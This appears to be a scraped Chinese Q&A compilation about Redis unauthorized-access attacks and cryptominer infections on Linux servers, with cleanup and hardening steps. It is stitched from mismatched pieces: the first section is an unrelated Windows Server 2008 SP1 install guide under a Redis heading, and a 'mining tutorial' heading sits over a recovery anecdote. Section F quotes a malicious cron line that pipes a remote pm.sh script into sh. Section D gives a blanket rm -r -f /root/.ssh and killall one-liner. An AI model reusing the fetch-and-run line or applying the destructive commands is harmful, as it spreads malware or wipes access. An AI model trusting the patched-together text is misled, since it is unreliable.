redis挖礦病毒

A. 如何在Windows Server 2008 R2 SP1安裝Redis

使用具有管理員許可權的賬戶進行更新
安裝某些程序或更新可能需要在管理員賬戶下才能正常安裝，其他的賬戶可能限制了安裝的程序或更新。至於怎麼用管理員許可權的賬戶登錄計算機呢？【首先右擊計算機，打開的菜單選「管理」命令，在左側控制台樹窗口單擊「本地用戶和組」欄下的「用戶」，在右邊窗格我們可以看到名稱為「administrator」的賬戶，這個就是管理員賬戶，雙擊打開，將「賬戶已禁用」的勾去掉，並單擊「確定」按鈕。這樣就啟用了管理員賬戶。】
退出所有正在運行的第三方程序
在安裝sp1前，應將所有第三方程序退出，以防程序在執行操作過程干擾了sp1的安裝。
禁用病毒防護軟體
在安裝sp1過程中，病毒防護軟體可能會攔截更新程序，特別是第三方病毒防護軟體。另外，病毒防護軟體因為需要實時掃描系統的文件，因而也會影響到安裝的速度。
卸載已經安裝過的
sp1
測試版或預發行版
在安裝正式版的sp1前，先把測試版或預發行版卸載掉，不然在安裝正式版的時候，可能會提示「系統已安裝sp1」之類的現象。
安裝
kb976902
補丁包
kb976902是安裝
sp1
的先決條件，所以在安裝sp1前先安裝kb976902
補丁包能避免意想不到的問題【下載地址在參考資料中】
安裝系統更新就緒工具
系統更新就緒工具有助於解決可能阻止
windows更新和
service
pack
安裝的問題。例如，如果某個已破壞的系統文件阻止某個更新識別在您的計算機上運行的
windows的版本，則可能無法安裝該更新。（本段文字來源於微軟官方網站）【下載地址在參考資料中】
使用
chkdsk
命令檢查磁碟
以管理員身份運行「命令提示符（cmd）」，並執行「chkdsk
c:
/f」命令對磁碟進行掃描和修復。【c指系統所在分區的盤符】
使用
sfc
命令檢查和修復系統文件
以管理員身份運行「命令提示符（cmd）」，並執行「sfc
/scannow」命令掃描所有受保護的系統文件並用正確的
microsoft
版本替換不正確的版本。
9
以上操作，基本能有效解決sp1安裝失敗的問題。但如果是「service
pack
安裝無法繼續」或「缺少
service
pack
需要的一個或多個系統組件」諸如此類的錯誤消息，那麼可能您在之前使用過第三方優化軟體將系統中與sp1關聯的系統組件給刪除了。

B. redis漏洞 可以入侵windows嗎

Redis 默認情況下，會綁定在 0.0.0.0:6379，這樣將會將 Redis 服務暴露到公網上，如果在沒有開啟認證的情況下，可以導致任意用戶在可以訪問目標伺服器的情況下未授權訪問 Redis 以及讀取 Redis 的數據。攻擊者在未授權訪問 Redis 的情況下可以利用 Redis 的相關方法，可以成功在 Redis 伺服器上寫入公鑰，進而可以使用對應私鑰直接登錄目標伺服器。

C. 中挖礦病毒的表現

故障現象：使用過程中，發現經常有服務無故關閉，登錄伺服器經檢查，發現CPU使用率達到100%。在檢測異常進程中，未發現CPU使用率異常的進程（使用 top、htop 以及 ps -aux 進行檢查），於是報障。

檢測過程：

1.找到他shell腳本對應目錄把目錄或者文件刪除。

2.檢查定時任務是否存在挖礦木馬文件在定時任務中，避免定時運行挖礦木馬文件。

3.添加hosts挖礦病毒訪問對應網站，避免二次訪問並下載。

4.排查liunx命令是否損壞，如損壞下載"procps-3.2.8"並編譯，恢復top等系列命令。

5.檢測進程是否異常。

6.排查入侵入口，例如 redis是否存在弱口令，nginx或者apache上面的網站程序是否存在漏洞，並排查下nginx或者apache日誌審查漏洞所在處。

7.排查ssh登錄日誌。

8.把ssh登錄切換成秘鑰登錄。

9.重啟伺服器，檢查是否進程是否正常。

D. .如果一台linux伺服器中了botnet病毒,該如何排查

1、病毒木馬排查。
1.1、使用netstat查看網路連接，分析是否有可疑發送行為，如有則停止。
在伺服器上發現一個大寫的CRONTAB命令，然後進行命令清理及計劃任務排查。
(linux常見木馬，清理命令chattr -i /usr/bin/.sshd; rm -f /usr/bin/.sshd; chattr -i /usr/bin/.swhd; rm -f /usr/bin/.swhd; rm -f -r /usr/bin/bsd-port; cp /usr/bin/dpkgd/ps /bin/ps; cp /usr/bin/dpkgd/netstat /bin/netstat; cp /usr/bin/dpkgd/lsof /usr/sbin/lsof; cp /usr/bin/dpkgd/ss /usr/sbin/ss;rm -r -f /root/.ssh; rm -r -f /usr/bin/bsd-port;find /proc/ -name exe | xargs ls -l | grep -v task |grep deleted| awk '{print $11}' | awk -F/ '{print $NF}' | xargs killall -9;）
1.2、使用殺毒軟體進行病毒查殺。
2、伺服器漏洞排查並修復
2.1、查看伺服器賬號是否有異常，如有則停止刪除掉。
2.2、查看伺服器是否有異地登錄情況，如有則修改密碼為強密碼（字每+數字+特殊符號）大小寫，10位及以上。
2.3、查看Jenkins、Tomcat、PhpMyadmin、WDCP、Weblogic後台密碼，提高密碼強度（字每+數字+特殊符號）大小寫，10位及以上。
2.4、查看WEB應用是否有漏洞，如struts, ElasticSearch等，如有則請升級。
2.5、查看MySQL、SQLServer、FTP、WEB管理後台等其它有設置密碼的地方，提高密碼強度（字每+數字+特殊符號）大小寫，10位及以上。
2.6、查看Redis無密碼可遠程寫入文件漏洞，檢查/root/.ssh/下黑客創建的SSH登錄密鑰文件，刪除掉，修改Redis為有密碼訪問並使用強密碼，不需要公網訪問最好bind 127.0.0.1本地訪問。
2.7、如果有安裝第三方軟體，請按官網指引進行修復。

E. 如何用Linux伺服器挖礦教程

今天早上起來一看，伺服器腳本一個都沒有啟動!甚是奇怪，遠程登錄伺服器，也是異常的卡，直到最後卡死，只好重新啟動伺服器!
啟動之後沒一會又會變卡，越來越卡，top查看進程！不覺又奇怪的進程，因為平常也不經常看！所以自己也搞不明白怎麼回事兒！只好到群里問了問，說是被挖礦的掛了木馬文件了，是由於redis的漏洞!
後來我自己發現，原來redis遠程可以直接登錄，原以為redis和mysql不開放登錄許可權就不會支持遠程登錄呢，看來是我想多了
看了好長時間才發現一個異常的進程，自啟的進程 molibe ！
找到進程位置 ps -ef|grep molibe ;
在tmp目錄下，打開一看的確是有
chmod -x molibe 取消執行許可權在來到/var/spool/cron下，cat root 查看定時器的執行發現之前腳本都被改了，顧不得刪除cron，service crond restart 重新啟動,再有就時kill 掉molibe進程
這樣大概整個就結束了！但是根本是因為redis漏洞，所以還是補上吧
首先修改redis'埠,找到redis.conf文件 port **** 修改埠號再有就是必須修改密碼 # requirepass ******** 去除#號重新啟動 /redis/src/redis-server /redis/redis-conf
啟動成功之後
redis/redis-cli -p ****(埠) -a *****(密碼)

F. 阿里雲伺服器被挖礦了怎麼辦(純純電腦小白

1. 關閉訪問挖礦伺服器的訪問

iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.

2. chmod -x minerd ,取消掉執行許可權， 在沒有找到根源前，千萬不要刪除 minerd，因為刪除了，過一回會自動有生成一個。

3. pkill minerd ,殺掉進程

4. service stop crond 或者 crontab -r 刪除所有的執行計劃

5. 執行top，查看了一會，沒有再發現minerd 進程了。

6.檢查/var/spool/cron/目錄下發現有個root用戶的定時器文件。

下載腳本的語句：

*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh
病毒文件內容如下，感興趣的可以研究下：

View Code

解決minerd並不是最終的目的，主要是要查找問題根源，我的伺服器問題出在了redis服務了，黑客利用了redis的一個漏洞獲得了伺服器的訪問許可權，http://blog.jobbole.com/94518/然後就注入了病毒，下面是解決辦法和清除工作：

1. 修復 redis 的後門,

配置bind選項, 限定可以連接Redis伺服器的IP, 並修改redis的默認埠6379.
配置AUTH, 設置密碼, 密碼會以明文方式保存在redis配置文件中.
配置rename-command CONFIG 「RENAME_CONFIG」, 這樣即使存在未授權訪問, 也能夠給攻擊者使用config指令加大難度
好消息是Redis作者表示將會開發」real user」，區分普通用戶和admin許可權，普通用戶將會被禁止運行某些命令，如conf
2. 打開 ~/.ssh/authorized_keys, 刪除你不認識的賬號

3. 查看你的用戶列表，是不是有你不認識的用戶添加進來。 如果有就刪除掉.

G. 怎樣知道有redis未授權訪問

Redis因配置不當可以導致未授權訪問，被攻擊者惡意利用。當前流行的針對Redis未授權訪問的一種新型攻擊方式，在特定條件下，如果Redis以root身份運行，黑客可以給root賬戶寫入SSH公鑰文件，直接通過SSH登錄受害伺服器，可導致伺服器許可權被獲取和數據刪除、泄露或加密勒索事件發生，嚴重危害業務正常服務。